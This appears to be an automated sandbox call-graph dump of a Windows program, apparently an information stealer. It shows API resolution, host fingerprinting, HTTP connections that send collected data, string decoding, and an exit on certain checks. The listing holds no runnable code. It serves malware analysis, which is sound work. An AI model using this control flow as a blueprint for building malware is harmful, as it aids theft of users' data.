14419 2a3d8e 14418->14419 14420 2a45c0 2 API calls 14419->14420 14421 2a3da7 14420->14421 14422 2a45c0 2 API calls 14421->14422 14423 2a3dc0 14422->14423 14424 2a45c0 2 API calls 14423->14424 14425 2a3dd9 14424->14425 14426 2a45c0 2 API calls 14425->14426 14427 2a3df2 14426->14427 14428 2a45c0 2 API calls 14427->14428 14429 2a3e0b 14428->14429 14430 2a45c0 2 API calls 14429->14430 14431 2a3e24 14430->14431 14432 2a45c0 2 API calls 14431->14432 14433 2a3e3d 14432->14433 14434 2a45c0 2 API calls 14433->14434 14435 2a3e56 14434->14435 14436 2a45c0 2 API calls 14435->14436 14437 2a3e6f 14436->14437 14438 2a45c0 2 API calls 14437->14438 14439 2a3e88 14438->14439 14440 2a45c0 2 API calls 14439->14440 14441 2a3ea1 14440->14441 14442 2a45c0 2 API calls 14441->14442 14443 2a3eba 14442->14443 14444 2a45c0 2 API calls 14443->14444 14445 2a3ed3 14444->14445 14446 2a45c0 2 API calls 14445->14446 14447 2a3eec 14446->14447 14448 2a45c0 2 API calls 14447->14448 14449 2a3f05 14448->14449 14450 2a45c0 2 API calls 14449->14450 14451 2a3f1e 14450->14451 14452 2a45c0 2 API calls 14451->14452 14453 2a3f37 14452->14453 14454 2a45c0 2 API calls 14453->14454 14455 2a3f50 14454->14455 14456 2a45c0 2 API calls 14455->14456 14457 2a3f69 14456->14457 14458 2a45c0 2 API calls 14457->14458 14459 2a3f82 14458->14459 14460 2a45c0 2 API calls 14459->14460 14461 2a3f9b 14460->14461 14462 2a45c0 2 API calls 14461->14462 14463 2a3fb4 14462->14463 14464 2a45c0 2 API calls 14463->14464 14465 2a3fcd 14464->14465 14466 2a45c0 2 API calls 14465->14466 14467 2a3fe6 14466->14467 14468 2a45c0 2 API calls 14467->14468 14469 2a3fff 14468->14469 14470 2a45c0 2 API calls 14469->14470 14471 2a4018 14470->14471 14472 2a45c0 2 API calls 14471->14472 14473 2a4031 14472->14473 14474 2a45c0 2 API calls 14473->14474 14475 2a404a 14474->14475 14476 2a45c0 2 API calls 14475->14476 14477 2a4063 14476->14477 14478 2a45c0 2 API calls 14477->14478 14479 2a407c 14478->14479 14480 2a45c0 2 API calls 14479->14480 14481 2a4095 14480->14481 14482 2a45c0 2 API calls 14481->14482 14483 2a40ae 14482->14483 14484 2a45c0 2 API calls 14483->14484 14485 2a40c7 14484->14485 14486 2a45c0 2 API calls 14485->14486 14487 2a40e0 14486->14487 14488 2a45c0 2 API calls 14487->14488 14489 2a40f9 14488->14489 14490 2a45c0 2 API calls 14489->14490 14491 2a4112 14490->14491 14492 2a45c0 2 API calls 14491->14492 14493 2a412b 14492->14493 14494 2a45c0 2 API calls 14493->14494 14495 2a4144 14494->14495 14496 2a45c0 2 API calls 14495->14496 14497 2a415d 14496->14497 14498 2a45c0 2 API calls 14497->14498 14499 2a4176 14498->14499 14500 2a45c0 2 API calls 14499->14500 14501 2a418f 14500->14501 14502 2a45c0 2 API calls 14501->14502 14503 2a41a8 14502->14503 14504 2a45c0 2 API calls 14503->14504 14505 2a41c1 14504->14505 14506 2a45c0 2 API calls 14505->14506 14507 2a41da 14506->14507 14508 2a45c0 2 API calls 14507->14508 14509 2a41f3 14508->14509 14510 2a45c0 2 API calls 14509->14510 14511 2a420c 14510->14511 14512 2a45c0 2 API calls 14511->14512 14513 2a4225 14512->14513 14514 2a45c0 2 API calls 14513->14514 14515 2a423e 14514->14515 14516 2a45c0 2 API calls 14515->14516 14517 2a4257 14516->14517 14518 2a45c0 2 API calls 14517->14518 14519 2a4270 14518->14519 14520 2a45c0 2 API calls 14519->14520 14521 2a4289 14520->14521 14522 2a45c0 2 API calls 14521->14522 14523 2a42a2 14522->14523 14524 2a45c0 2 API calls 14523->14524 14525 2a42bb 14524->14525 14526 2a45c0 2 API calls 14525->14526 14527 2a42d4 14526->14527 14528 2a45c0 2 API calls 14527->14528 14529 2a42ed 14528->14529 14530 2a45c0 2 API calls 14529->14530 14531 2a4306 14530->14531 14532 2a45c0 2 API calls 14531->14532 14533 2a431f 14532->14533 14534 2a45c0 2 API calls 14533->14534 14535 2a4338 14534->14535 14536 2a45c0 2 API calls 14535->14536 14537 2a4351 14536->14537 14538 2a45c0 2 API calls 14537->14538 14539 2a436a 14538->14539 14540 2a45c0 2 API calls 14539->14540 14541 2a4383 14540->14541 14542 2a45c0 2 API calls 14541->14542 14543 2a439c 14542->14543 14544 2a45c0 2 API calls 14543->14544 14545 2a43b5 14544->14545 14546 2a45c0 2 API calls 14545->14546 14547 2a43ce 14546->14547 14548 2a45c0 2 API calls 14547->14548 14549 2a43e7 14548->14549 14550 2a45c0 2 API calls 14549->14550 14551 2a4400 14550->14551 14552 2a45c0 2 API calls 14551->14552 14553 2a4419 14552->14553 14554 2a45c0 2 API calls 14553->14554 14555 2a4432 14554->14555 14556 2a45c0 2 API calls 14555->14556 14557 2a444b 14556->14557 14558 2a45c0 2 API calls 14557->14558 14559 2a4464 14558->14559 14560 2a45c0 2 API calls 14559->14560 14561 2a447d 14560->14561 14562 2a45c0 2 API calls 14561->14562 14563 2a4496 14562->14563 14564 2a45c0 2 API calls 14563->14564 14565 2a44af 14564->14565 14566 2a45c0 2 API calls 14565->14566 14567 2a44c8 14566->14567 14568 2a45c0 2 API calls 14567->14568 14569 2a44e1 14568->14569 14570 2a45c0 2 API calls 14569->14570 14571 2a44fa 14570->14571 14572 2a45c0 2 API calls 14571->14572 14573 2a4513 14572->14573 14574 2a45c0 2 API calls 14573->14574 14575 2a452c 14574->14575 14576 2a45c0 2 API calls 14575->14576 14577 2a4545 14576->14577 14578 2a45c0 2 API calls 14577->14578 14579 2a455e 14578->14579 14580 2a45c0 2 API calls 14579->14580 14581 2a4577 14580->14581 14582 2a45c0 2 API calls 14581->14582 14583 2a4590 14582->14583 14584 2a45c0 2 API calls 14583->14584 14585 2a45a9 14584->14585 14586 2b9c10 14585->14586 14587 2b9c20 43 API calls 14586->14587 14588 2ba036 8 API calls 14586->14588 14587->14588 14589 2ba0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14588->14589 14590 2ba146 14588->14590 14589->14590 14591 2ba153 8 API calls 14590->14591 14592 2ba216 14590->14592 14591->14592 14593 2ba298 14592->14593 14594 2ba21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14592->14594 14595 2ba337 14593->14595 14596 2ba2a5 6 API calls 14593->14596 14594->14593 14597 2ba41f 14595->14597 14598 2ba344 9 API calls 14595->14598 14596->14595 14599 2ba428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14597->14599 14600 2ba4a2 14597->14600 14598->14597 14599->14600 14601 2ba4ab GetProcAddress GetProcAddress 14600->14601 14602 2ba4dc 14600->14602 14601->14602 14603 2ba515 14602->14603 14604 2ba4e5 GetProcAddress GetProcAddress 14602->14604 14605 2ba612 14603->14605 14606 2ba522 10 API calls 14603->14606 14604->14603 14607 2ba61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14605->14607 14608 2ba67d 14605->14608 14606->14605 14607->14608 14609 2ba69e 14608->14609 14610 2ba686 GetProcAddress 14608->14610 14611 2b5ca3 14609->14611 14612 2ba6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14609->14612 14610->14609 14613 2a1590 14611->14613 14612->14611 15734 2a1670 14613->15734 14616 2ba7a0 lstrcpy 14617 2a15b5 14616->14617 14618 2ba7a0 lstrcpy 14617->14618 14619 2a15c7 14618->14619 14620 2ba7a0 lstrcpy 14619->14620 14621 2a15d9 14620->14621 14622 2ba7a0 lstrcpy 14621->14622 14623 2a1663 14622->14623 14624 2b5510 14623->14624 14625 2b5521 14624->14625 14626 2ba820 2 API calls 14625->14626 14627 2b552e 14626->14627 14628 2ba820 2 API calls 14627->14628 14629 2b553b 14628->14629 14630 2ba820 2 API calls 14629->14630 14631 2b5548 14630->14631 14632 2ba740 lstrcpy 14631->14632 14633 2b5555 14632->14633 14634 2ba740 lstrcpy 14633->14634 14635 2b5562 14634->14635 14636 2ba740 lstrcpy 14635->14636 14637 2b556f 14636->14637 14638 2ba740 lstrcpy 14637->14638 14675 2b557c 14638->14675 14639 2b5643 StrCmpCA 14639->14675 14640 2b56a0 StrCmpCA 14641 2b57dc 14640->14641 14640->14675 14642 2ba8a0 lstrcpy 14641->14642 14644 2b57e8 14642->14644 14643 2a1590 lstrcpy 14643->14675 14646 2ba820 2 API calls 14644->14646 14645 2ba820 lstrlen lstrcpy 14645->14675 14647 2b57f6 14646->14647 14651 2ba820 2 API calls 14647->14651 14648 2b5856 StrCmpCA 14649 2b5991 14648->14649 14648->14675 14652 2ba8a0 lstrcpy 14649->14652 14650 2ba7a0 lstrcpy 14650->14675 14653 2b5805 14651->14653 14654 2b599d 14652->14654 14655 2a1670 lstrcpy 14653->14655 14657 2ba820 2 API calls 14654->14657 14674 2b5811 14655->14674 14656 2ba740 lstrcpy 14656->14675 14659 2b59ab 14657->14659 14658 2b5a0b StrCmpCA 14660 2b5a28 14658->14660 14661 2b5a16 Sleep 14658->14661 14662 2ba820 2 API calls 14659->14662 14663 2ba8a0 lstrcpy 14660->14663 14661->14675 14664 2b59ba 14662->14664 14666 2b5a34 14663->14666 14665 2a1670 lstrcpy 14664->14665 14665->14674 14667 2ba820 2 API calls 14666->14667 14668 2b5a43 14667->14668 14670 2ba820 2 API calls 14668->14670 14669 2b52c0 25 API calls 14669->14675 14671 2b5a52 14670->14671 14673 2a1670 lstrcpy 14671->14673 14672 2b578a StrCmpCA 14672->14675 14673->14674 14674->13731 14675->14639 14675->14640 14675->14643 14675->14645 14675->14648 14675->14650 14675->14656 14675->14658 14675->14669 14675->14672 14676 2b593f StrCmpCA 14675->14676 14677 2b51f0 20 API calls 14675->14677 14678 2ba8a0 lstrcpy 14675->14678 14676->14675 14677->14675 14678->14675 14680 2b754c 14679->14680 14681 2b7553 GetVolumeInformationA 14679->14681 14680->14681 14682 2b7591 14681->14682 14683 2b75fc GetProcessHeap RtlAllocateHeap 14682->14683 14684 2b7619 14683->14684 14685 2b7628 wsprintfA 14683->14685 14687 2ba740 lstrcpy 14684->14687 14686 2ba740 lstrcpy 14685->14686 14688 2b5da7 14686->14688 14687->14688 14688->13752 14690 2ba7a0 lstrcpy 14689->14690 14691 2a4899 14690->14691 15743 2a47b0 14691->15743 14693 2a48a5 14694 2ba740 lstrcpy 14693->14694 14695 2a48d7 14694->14695 14696 2ba740 lstrcpy 14695->14696 14697 2a48e4 14696->14697 14698 2ba740 lstrcpy 14697->14698 14699 2a48f1 14698->14699 14700 2ba740 lstrcpy 14699->14700 14701 2a48fe 14700->14701 14702 2ba740 lstrcpy 14701->14702 14703 2a490b InternetOpenA StrCmpCA 14702->14703 14704 2a4944 14703->14704 14705 2a4ecb InternetCloseHandle 14704->14705 15749 2b8b60 14704->15749 14707 2a4ee8 14705->14707 15764 2a9ac0 CryptStringToBinaryA 14707->15764 14708 2a4963 15757 2ba920 14708->15757 14711 2a4976 14713 2ba8a0 lstrcpy 14711->14713 14718 2a497f 14713->14718 14714 2ba820 2 API calls 14715 2a4f05 14714->14715 14717 2ba9b0 4 API calls 14715->14717 14716 2a4f27 codecvt 14721 2ba7a0 lstrcpy 14716->14721 14719 2a4f1b 14717->14719 14722 2ba9b0 4 API calls 14718->14722 14720 2ba8a0 lstrcpy 14719->14720 14720->14716 14733 2a4f57 14721->14733 14723 2a49a9 14722->14723 14724 2ba8a0 lstrcpy 14723->14724 14725 2a49b2 14724->14725 14726 2ba9b0 4 API calls 14725->14726 14727 2a49d1 14726->14727 14728 2ba8a0 lstrcpy 14727->14728 14729 2a49da 14728->14729 14730 2ba920 3 API calls 14729->14730 14731 2a49f8 14730->14731 14732 2ba8a0 lstrcpy 14731->14732 14734 2a4a01 14732->14734 14733->13755 14735 2ba9b0 4 API calls 14734->14735 14736 2a4a20 14735->14736 14737 2ba8a0 lstrcpy 14736->14737 14738 2a4a29 14737->14738 14739 2ba9b0 4 API calls 14738->14739 14740 2a4a48 14739->14740 14741 2ba8a0 lstrcpy 14740->14741 14742 2a4a51 14741->14742 14743 2ba9b0 4 API calls 14742->14743 14744 2a4a7d 14743->14744 14745 2ba920 3 API calls 14744->14745 14746 2a4a84 14745->14746 14747 2ba8a0 lstrcpy 14746->14747 14748 2a4a8d 14747->14748 14749 2a4aa3 InternetConnectA 14748->14749 14749->14705 14750 2a4ad3 HttpOpenRequestA 14749->14750 14752 2a4b28 14750->14752 14753 2a4ebe InternetCloseHandle 14750->14753 14754 2ba9b0 4 API calls 14752->14754 14753->14705 14755 2a4b3c 14754->14755 14756 2ba8a0 lstrcpy 14755->14756 14757 2a4b45 14756->14757 14758 2ba920 3 API calls 14757->14758 14759 2a4b63 14758->14759 14760 2ba8a0 lstrcpy 14759->14760 14761 2a4b6c 14760->14761 14762 2ba9b0 4 API calls 14761->14762 14763 2a4b8b 14762->14763 14764 2ba8a0 lstrcpy 14763->14764 14765 2a4b94 14764->14765 14766 2ba9b0 4 API calls 14765->14766 14767 2a4bb5 14766->14767 14768 2ba8a0 lstrcpy 14767->14768 14769 2a4bbe 14768->14769 14770 2ba9b0 4 API calls 14769->14770 14771 2a4bde 14770->14771 14772 2ba8a0 lstrcpy 14771->14772 14773 2a4be7 14772->14773 14774 2ba9b0 4 API calls 14773->14774 14775 2a4c06 14774->14775 14776 2ba8a0 lstrcpy 14775->14776 14777 2a4c0f 14776->14777 14778 2ba920 3 API calls 14777->14778 14779 2a4c2d 14778->14779 14780 2ba8a0 lstrcpy 14779->14780 14781 2a4c36 14780->14781 14782 2ba9b0 4 API calls 14781->14782 14783 2a4c55 14782->14783 14784 2ba8a0 lstrcpy 14783->14784 14785 2a4c5e 14784->14785 14786 2ba9b0 4 API calls 14785->14786 14787 2a4c7d 14786->14787 14788 2ba8a0 lstrcpy 14787->14788 14789 2a4c86 14788->14789 14790 2ba920 3 API calls 14789->14790 14791 2a4ca4 14790->14791 14792 2ba8a0 lstrcpy 14791->14792 14793 2a4cad 14792->14793 14794 2ba9b0 4 API calls 14793->14794 14795 2a4ccc 14794->14795 14796 2ba8a0 lstrcpy 14795->14796 14797 2a4cd5 14796->14797 14798 2ba9b0 4 API calls 14797->14798 14799 2a4cf6 14798->14799 14800 2ba8a0 lstrcpy 14799->14800 14801 2a4cff 14800->14801 14802 2ba9b0 4 API calls 14801->14802 14803 2a4d1f 14802->14803 14804 2ba8a0 lstrcpy 14803->14804 14805 2a4d28 14804->14805 14806 2ba9b0 4 API calls 14805->14806 14807 2a4d47 14806->14807 14808 2ba8a0 lstrcpy 14807->14808 14809 2a4d50 14808->14809 14810 2ba920 3 API calls 14809->14810 14811 2a4d6e 14810->14811 14812 2ba8a0 lstrcpy 14811->14812 14813 2a4d77 14812->14813 14814 2ba740 lstrcpy 14813->14814 14815 2a4d92 14814->14815 14816 2ba920 3 API calls 14815->14816 14817 2a4db3 14816->14817 14818 2ba920 3 API calls 14817->14818 14819 2a4dba 14818->14819 14820 2ba8a0 lstrcpy 14819->14820 14821 2a4dc6 14820->14821 14822 2a4de7 lstrlen 14821->14822 14823 2a4dfa 14822->14823 14824 2a4e03 lstrlen 14823->14824 15763 2baad0 14824->15763 14826 2a4e13 HttpSendRequestA 14827 2a4e32 InternetReadFile 14826->14827 14828 2a4e67 InternetCloseHandle 14827->14828 14833 2a4e5e 14827->14833 14830 2ba800 14828->14830 14830->14753 14831 2ba9b0 4 API calls 14831->14833 14832 2ba8a0 lstrcpy 14832->14833 14833->14827 14833->14828 14833->14831 14833->14832 15770 2baad0 14834->15770 14836 2b17c4 StrCmpCA 14837 2b17cf ExitProcess 14836->14837 14839 2b17d7 14836->14839 14838 2b19c2 14838->13757 14839->14838 14840 2b18cf StrCmpCA 14839->14840 14841 2b18ad StrCmpCA 14839->14841 14842 2b187f StrCmpCA 14839->14842 14843 2b185d StrCmpCA 14839->14843 14844 2b1913 StrCmpCA 14839->14844 14845 2b1932 StrCmpCA 14839->14845 14846 2b18f1 StrCmpCA 14839->14846 14847 2b1951 StrCmpCA 14839->14847 14848 2b1970 StrCmpCA 14839->14848 14849 2ba820 lstrlen lstrcpy 14839->14849 14840->14839 14841->14839 14842->14839 14843->14839 14844->14839 14845->14839 14846->14839 14847->14839 14848->14839 14849->14839 14851 2ba7a0 lstrcpy 14850->14851 14852 2a5979 14851->14852 14853 2a47b0 2 API calls 14852->14853 14854 2a5985 14853->14854 14855 2ba740 lstrcpy 14854->14855 14856 2a59ba 14855->14856 14857 2ba740 lstrcpy 14856->14857 14858 2a59c7 14857->14858 14859 2ba740 lstrcpy 14858->14859 14860 2a59d4 14859->14860 14861 2ba740 lstrcpy 14860->14861 14862 2a59e1 14861->14862 14863 2ba740 lstrcpy 14862->14863 14864 2a59ee InternetOpenA StrCmpCA 14863->14864 14865 2a5a1d 14864->14865 14866 2a5fc3 InternetCloseHandle 14865->14866 14868 2b8b60 3 API calls 14865->14868 14867 2a5fe0 14866->14867 14871 2a9ac0 4 API calls 14867->14871 14869 2a5a3c 14868->14869 14870 2ba920 3 API calls 14869->14870 14872 2a5a4f 14870->14872 14873 2a5fe6 14871->14873 14874 2ba8a0 lstrcpy 14872->14874 14875 2ba820 2 API calls 14873->14875 14877 2a601f codecvt 14873->14877 14879 2a5a58 14874->14879 14876 2a5ffd 14875->14876 14878 2ba9b0 4 API calls 14876->14878 14881 2ba7a0 lstrcpy 14877->14881 14880 2a6013 14878->14880 14883 2ba9b0 4 API calls 14879->14883 14882 2ba8a0 lstrcpy 14880->14882 14891 2a604f 14881->14891 14882->14877 14884 2a5a82 14883->14884 14885 2ba8a0 lstrcpy 14884->14885 14886 2a5a8b 14885->14886 14887 2ba9b0 4 API calls 14886->14887 14888 2a5aaa 14887->14888 14889 2ba8a0 lstrcpy 14888->14889 14890 2a5ab3 14889->14890 14892 2ba920 3 API calls 14890->14892 14891->13763 14893 2a5ad1 14892->14893 14894 2ba8a0 lstrcpy 14893->14894 14895 2a5ada 14894->14895 14896 2ba9b0 4 API calls 14895->14896 14897 2a5af9 14896->14897 14898 2ba8a0 lstrcpy 14897->14898 14899 2a5b02 14898->14899 14900 2ba9b0 4 API calls 14899->14900 14901 2a5b21 14900->14901 14902 2ba8a0 lstrcpy 14901->14902 14903 2a5b2a 14902->14903 14904 2ba9b0 4 API calls 14903->14904 14905 2a5b56 14904->14905 14906 2ba920 3 API calls 14905->14906 14907 2a5b5d 14906->14907 14908 2ba8a0 lstrcpy 14907->14908 14909 2a5b66 14908->14909 14910 2a5b7c InternetConnectA 14909->14910 14910->14866 14911 2a5bac HttpOpenRequestA 14910->14911 14913 2a5c0b 14911->14913 14914 2a5fb6 InternetCloseHandle 14911->14914 14915 2ba9b0 4 API calls 14913->14915 14914->14866 14916 2a5c1f 14915->14916 14917 2ba8a0 lstrcpy 14916->14917 14918 2a5c28 14917->14918 14919 2ba920 3 API calls 14918->14919 14920 2a5c46 14919->14920 14921 2ba8a0 lstrcpy 14920->14921 14922 2a5c4f 14921->14922 14923 2ba9b0 4 API calls 14922->14923 14924 2a5c6e 14923->14924 14925 2ba8a0 lstrcpy 14924->14925 14926 2a5c77 14925->14926 14927 2ba9b0 4 API calls 14926->14927 14928 2a5c98 14927->14928 14929 2ba8a0 lstrcpy 14928->14929 14930 2a5ca1 14929->14930 14931 2ba9b0 4 API calls 14930->14931 14932 2a5cc1 14931->14932 14933 2ba8a0 lstrcpy 14932->14933 14934 2a5cca 14933->14934 14935 2ba9b0 4 API calls 14934->14935 14936 2a5ce9 14935->14936 14937 2ba8a0 lstrcpy 14936->14937 14938 2a5cf2 14937->14938 14939 2ba920 3 API calls 14938->14939 14940 2a5d10 14939->14940 14941 2ba8a0 lstrcpy 14940->14941 14942 2a5d19 14941->14942 14943 2ba9b0 4 API calls 14942->14943 14944 2a5d38 14943->14944 14945 2ba8a0 lstrcpy 14944->14945 14946 2a5d41 14945->14946 14947 2ba9b0 4 API calls 14946->14947 14948 2a5d60 14947->14948 14949 2ba8a0 lstrcpy 14948->14949 14950 2a5d69 14949->14950 14951 2ba920 3 API calls 14950->14951 14952 2a5d87 14951->14952 14953 2ba8a0 lstrcpy 14952->14953 14954 2a5d90 14953->14954 14955 2ba9b0 4 API calls 14954->14955 14956 2a5daf 14955->14956 14957 2ba8a0 lstrcpy 14956->14957 14958 2a5db8 14957->14958 14959 2ba9b0 4 API calls 14958->14959 14960 2a5dd9 14959->14960 14961 2ba8a0 lstrcpy 14960->14961 14962 2a5de2 14961->14962 14963 2ba9b0 4 API calls 14962->14963 14964 2a5e02 14963->14964 14965 2ba8a0 lstrcpy 14964->14965 14966 2a5e0b 14965->14966 14967 2ba9b0 4 API calls 14966->14967 14968 2a5e2a 14967->14968 14969 2ba8a0 lstrcpy 14968->14969 14970 2a5e33 14969->14970 14971 2ba920 3 API calls 14970->14971 14972 2a5e54 14971->14972 14973 2ba8a0 lstrcpy 14972->14973 14974 2a5e5d 14973->14974 14975 2a5e70 lstrlen 14974->14975 15771 2baad0 14975->15771 14977 2a5e81 lstrlen GetProcessHeap RtlAllocateHeap 15772 2baad0 14977->15772 14979 2a5eae lstrlen 14980 2a5ebe 14979->14980 14981 2a5ed7 lstrlen 14980->14981 14982 2a5ee7 14981->14982 14983 2a5ef0 lstrlen 14982->14983 14984 2a5f04 14983->14984 14985 2a5f1a lstrlen 14984->14985 15773 2baad0 14985->15773 14987 2a5f2a HttpSendRequestA 14988 2a5f35 InternetReadFile 14987->14988 14989 2a5f6a InternetCloseHandle 14988->14989 14993 2a5f61 14988->14993 14989->14914 14991 2ba9b0 4 API calls 14991->14993 14992 2ba8a0 lstrcpy 14992->14993 14993->14988 14993->14989 14993->14991 14993->14992 14996 2b1077 14994->14996 14995 2b1151 14995->13765 14996->14995 14997 2ba820 lstrlen lstrcpy 14996->14997 14997->14996 14999 2b0db7 14998->14999 15000 2b0f17 14999->15000 15001 2b0e27 StrCmpCA 14999->15001 15002 2b0e67 StrCmpCA 14999->15002 15003 2b0ea4 StrCmpCA 14999->15003 15004 2ba820 lstrlen lstrcpy 14999->15004 15000->13773 15001->14999 15002->14999 15003->14999 15004->14999 15006 2b0f67 15005->15006 15007 2b1044 15006->15007 15008 2b0fb2 StrCmpCA 15006->15008 15009 2ba820 lstrlen lstrcpy 15006->15009 15007->13781 15008->15006 15009->15006 15011 2ba740 lstrcpy 15010->15011 15012 2b1a26 15011->15012 15013 2ba9b0 4 API calls 15012->15013 15014 2b1a37 15013->15014 15015 2ba8a0 lstrcpy 15014->15015 15016 2b1a40 15015->15016 15017 2ba9b0 4 API calls 15016->15017 15018 2b1a5b 15017->15018 15019 2ba8a0 lstrcpy 15018->15019 15020 2b1a64 15019->15020 15021 2ba9b0 4 API calls 15020->15021 15022 2b1a7d 15021->15022 15023 2ba8a0 lstrcpy 15022->15023 15024 2b1a86 15023->15024 15025 2ba9b0 4 API calls 15024->15025 15026 2b1aa1 15025->15026 15027 2ba8a0 lstrcpy 15026->15027 15028 2b1aaa 15027->15028 15029 2ba9b0 4 API calls 15028->15029 15030 2b1ac3 15029->15030 15031 2ba8a0 lstrcpy 15030->15031 15032 2b1acc 15031->15032 15033 2ba9b0 4 API calls 15032->15033 15034 2b1ae7 15033->15034 15035 2ba8a0 lstrcpy 15034->15035 15036 2b1af0 15035->15036 15037 2ba9b0 4 API calls 15036->15037 15038 2b1b09 15037->15038 15039 2ba8a0 lstrcpy 15038->15039 15040 2b1b12 15039->15040 15041 2ba9b0 4 API calls 15040->15041 15042 2b1b2d 15041->15042 15043 2ba8a0 lstrcpy 15042->15043 15044 2b1b36 15043->15044 15045 2ba9b0 4 API calls 15044->15045 15046 2b1b4f 15045->15046 15047 2ba8a0 lstrcpy 15046->15047 15048 2b1b58 15047->15048 15049 2ba9b0 4 API calls 15048->15049 15050 2b1b76 15049->15050 15051 2ba8a0 lstrcpy 15050->15051 15052 2b1b7f 15051->15052 15053 2b7500 6 API calls 15052->15053 15054 2b1b96 15053->15054 15055 2ba920 3 API calls 15054->15055 15056 2b1ba9 15055->15056 15057 2ba8a0 lstrcpy 15056->15057 15058 2b1bb2 15057->15058 15059 2ba9b0 4 API calls 15058->15059 15060 2b1bdc 15059->15060 15061 2ba8a0 lstrcpy 15060->15061 15062 2b1be5 15061->15062 15063 2ba9b0 4 API calls 15062->15063 15064 2b1c05 15063->15064 15065 2ba8a0 lstrcpy 15064->15065 15066 2b1c0e 15065->15066 15774 2b7690 GetProcessHeap RtlAllocateHeap 15066->15774 15069 2ba9b0 4 API calls 15070 2b1c2e 15069->15070 15071 2ba8a0 lstrcpy 15070->15071 15072 2b1c37 15071->15072 15073 2ba9b0 4 API calls 15072->15073 15074 2b1c56 15073->15074 15075 2ba8a0 lstrcpy 15074->15075 15076 2b1c5f 15075->15076 15077 2ba9b0 4 API calls 15076->15077 15078 2b1c80 15077->15078 15079 2ba8a0 lstrcpy 15078->15079 15080 2b1c89 15079->15080 15781 2b77c0 GetCurrentProcess IsWow64Process 15080->15781 15083 2ba9b0 4 API calls 15084 2b1ca9 15083->15084 15085 2ba8a0 lstrcpy 15084->15085 15086 2b1cb2 15085->15086 15087 2ba9b0 4 API calls 15086->15087 15088 2b1cd1 15087->15088 15089 2ba8a0 lstrcpy 15088->15089 15090 2b1cda 15089->15090 15091 2ba9b0 4 API calls 15090->15091 15092 2b1cfb 15091->15092 15093 2ba8a0 lstrcpy 15092->15093 15094 2b1d04 15093->15094 15095 2b7850 3 API calls 15094->15095 15096 2b1d14 15095->15096 15097 2ba9b0 4 API calls 15096->15097 15098 2b1d24 15097->15098 15099 2ba8a0 lstrcpy 15098->15099 15100 2b1d2d 15099->15100 15101 2ba9b0 4 API calls 15100->15101 15102 2b1d4c 15101->15102 15103 2ba8a0 lstrcpy 15102->15103 15104 2b1d55 15103->15104 15105 2ba9b0 4 API calls 15104->15105 15106 2b1d75 15105->15106 15107 2ba8a0 lstrcpy 15106->15107 15108 2b1d7e 15107->15108 15109 2b78e0 3 API calls 15108->15109 15110 2b1d8e 15109->15110 15111 2ba9b0 4 API calls 15110->15111 15112 2b1d9e 15111->15112 15113 2ba8a0 lstrcpy 15112->15113 15114 2b1da7 15113->15114 15115 2ba9b0 4 API calls 15114->15115 15116 2b1dc6 15115->15116 15117 2ba8a0 lstrcpy 15116->15117 15118 2b1dcf 15117->15118 15119 2ba9b0 4 API calls 15118->15119 15120 2b1df0 15119->15120 15121 2ba8a0 lstrcpy 15120->15121 15122 2b1df9 15121->15122 15783 2b7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15122->15783 15125 2ba9b0 4 API calls 15126 2b1e19 15125->15126 15127 2ba8a0 lstrcpy 15126->15127 15128 2b1e22 15127->15128 15129 2ba9b0 4 API calls 15128->15129 15130 2b1e41 15129->15130 15131 2ba8a0 lstrcpy 15130->15131 15132 2b1e4a 15131->15132 15133 2ba9b0 4 API calls 15132->15133 15134 2b1e6b 15133->15134 15135 2ba8a0 lstrcpy 15134->15135 15136 2b1e74 15135->15136 15785 2b7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15136->15785 15139 2ba9b0 4 API calls 15140 2b1e94 15139->15140 15141 2ba8a0 lstrcpy 15140->15141 15142 2b1e9d 15141->15142 15143 2ba9b0 4 API calls 15142->15143 15144 2b1ebc 15143->15144 15145 2ba8a0 lstrcpy 15144->15145 15146 2b1ec5 15145->15146 15147 2ba9b0 4 API calls 15146->15147 15148 2b1ee5 15147->15148 15149 2ba8a0 lstrcpy 15148->15149 15150 2b1eee 15149->15150 15788 2b7b00 GetUserDefaultLocaleName 15150->15788 15153 2ba9b0 4 API calls 15154 2b1f0e 15153->15154 15155 2ba8a0 lstrcpy 15154->15155 15156 2b1f17 15155->15156 15157 2ba9b0 4 API calls 15156->15157 15158 2b1f36 15157->15158 15159 2ba8a0 lstrcpy 15158->15159 15160 2b1f3f 15159->15160 15161 2ba9b0 4 API calls 15160->15161 15162 2b1f60 15161->15162 15163 2ba8a0 lstrcpy 15162->15163 15164 2b1f69 15163->15164 15792 2b7b90 15164->15792 15166 2b1f80 15167 2ba920 3 API calls 15166->15167 15168 2b1f93 15167->15168 15169 2ba8a0 lstrcpy 15168->15169 15170 2b1f9c 15169->15170 15171 2ba9b0 4 API calls 15170->15171 15172 2b1fc6 15171->15172 15173 2ba8a0 lstrcpy 15172->15173 15174 2b1fcf 15173->15174 15175 2ba9b0 4 API calls 15174->15175 15176 2b1fef 15175->15176 15177 2ba8a0 lstrcpy 15176->15177 15178 2b1ff8 15177->15178 15804 2b7d80 GetSystemPowerStatus 15178->15804 15181 2ba9b0 4 API calls 15182 2b2018 15181->15182 15183 2ba8a0 lstrcpy 15182->15183 15184 2b2021 15183->15184 15185 2ba9b0 4 API calls 15184->15185 15186 2b2040 15185->15186 15187 2ba8a0 lstrcpy 15186->15187 15188 2b2049 15187->15188 15189 2ba9b0 4 API calls 15188->15189 15190 2b206a 15189->15190 15191 2ba8a0 lstrcpy 15190->15191 15192 2b2073 15191->15192 15193 2b207e GetCurrentProcessId 15192->15193 15806 2b9470 OpenProcess 15193->15806 15196 2ba920 3 API calls 15197 2b20a4 15196->15197 15198 2ba8a0 lstrcpy 15197->15198 15199 2b20ad 15198->15199 15200 2ba9b0 4 API calls 15199->15200 15201 2b20d7 15200->15201 15202 2ba8a0 lstrcpy 15201->15202 15203 2b20e0 15202->15203 15204 2ba9b0 4 API calls 15203->15204 15205 2b2100 15204->15205 15206 2ba8a0 lstrcpy 15205->15206 15207 2b2109 15206->15207 15811 2b7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15207->15811 15210 2ba9b0 4 API calls 15211 2b2129 15210->15211 15212 2ba8a0 